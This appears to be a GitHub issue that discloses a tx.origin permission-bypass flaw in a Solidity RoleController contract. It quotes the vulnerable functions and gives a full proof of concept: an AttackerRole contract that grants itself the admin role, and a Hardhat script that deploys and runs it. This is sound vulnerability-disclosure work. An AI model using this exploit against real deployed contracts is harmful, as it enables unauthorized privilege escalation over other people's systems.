You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Description
A vulnerability caused by tx.origin exists in the contract RoleController, which allows an attacker to bypass the associated permission checking operation. In the addRole function, tx.origin is used as an argument to the checkPermission function, which allows an attacker to control the Role modification
/**
* Public common checkPermission logic.
*/
function checkPermission(
address addr,
uint operation
)
public
constant
returns (bool)
{
console.log("tx.orgin: ",tx.origin);
if (operation == MODIFY_AUTHORITY_ISSUER) {
if (adminRoleBearer[addr] || committeeMemberRoleBearer[addr]) {
return true;
}
}
if (operation == MODIFY_COMMITTEE) {
if (adminRoleBearer[addr]) {
return true;
}
}
if (operation == MODIFY_ADMIN) {
if (adminRoleBearer[addr]) {
return true;
}
}
if (operation == MODIFY_KEY_CPT) {
if (authorityIssuerRoleBearer[addr]) {
return true;
}
}
return false;
}
/**
* Add Role.
*/
function addRole(
address addr,
uint role
)
public
{
if (role == ROLE_AUTHORITY_ISSUER) {
if (checkPermission(tx.origin, MODIFY_AUTHORITY_ISSUER)) {
authorityIssuerRoleBearer[addr] = true;
}
}
if (role == ROLE_COMMITTEE) {
if (checkPermission(tx.origin, MODIFY_COMMITTEE)) {
committeeMemberRoleBearer[addr] = true;
}
}
if (role == ROLE_ADMIN) {
if (checkPermission(tx.origin, MODIFY_ADMIN)) {
adminRoleBearer[addr] = true;
}
}
}
Reproduction
prepare harhat testing environment
copy problematic RoleController with inserted log output statement (line 12 shown above) which are used in test to a created directory contracts
create an attacker contract instance that can utilize the vulnerability AttackerRole
pragma solidity^0.4.24;
import"hardhat/console.sol";
import"./RoleController.sol";
interfaceIEvidence {
function addRole(addressaddr,uintrole)
public;
function checkPermission(addressaddr, uintoperation)
publicconstantreturns (bool);
}
contractAttackerRole {
address _evidence;
constructor(addressevidence) {
_evidence = evidence;
}
function callback() publicreturns (bool) {
console.log("msg.sender of Attacker: ", msg.sender);
//Set up admin roleIEvidence(_evidence).addRole(
address(this),
102
);
bool permission =IEvidence(_evidence).checkPermission(
address(this),
202
);
// test the success of attack using tx.origin// permission equals to true if got attacked
console.log("permission: %s", permission);
if (permission ==true) {
console.log("successful attack.");
} else {
console.log("fail to attack.");
}
return permission;
}
}
When testing we first remove the admin role, as in line 10. And then using the followed test deployment js to execute npx hardhat run scripts/deployrole.js
asyncfunctionmain(){const[deployer]=awaitethers.getSigners();console.log("Deploying contracts with the account:",deployer.address);constvictim=awaitethers.getContractFactory("RoleController");consttoken=awaitvictim.deploy();//Remove admin privilege firstawaittoken.removeRole(token.address,102);console.log("Victim RoleController address:",token.address);constattacker=awaitethers.getContractFactory("AttackerRole");constatt=awaitattacker.deploy(token.address);console.log("Attacker address:",att.address);constres=awaitatt.callback();console.log(res);}main().then(()=>process.exit(0)).catch((error)=>{console.error(error);process.exit(1);});
The text was updated successfully, but these errors were encountered:
Description
A vulnerability caused by
tx.originexists in the contractRoleController, which allows an attacker to bypass the associated permission checking operation. In theaddRolefunction,tx.originis used as an argument to thecheckPermissionfunction, which allows an attacker to control the Role modificationReproduction
prepare harhat testing environment
copy problematic RoleController with inserted log output statement (line 12 shown above) which are used in test to a created directory
contractscreate an attacker contract instance that can utilize the vulnerability
AttackerRolenpx hardhat run scripts/deployrole.jsThe text was updated successfully, but these errors were encountered: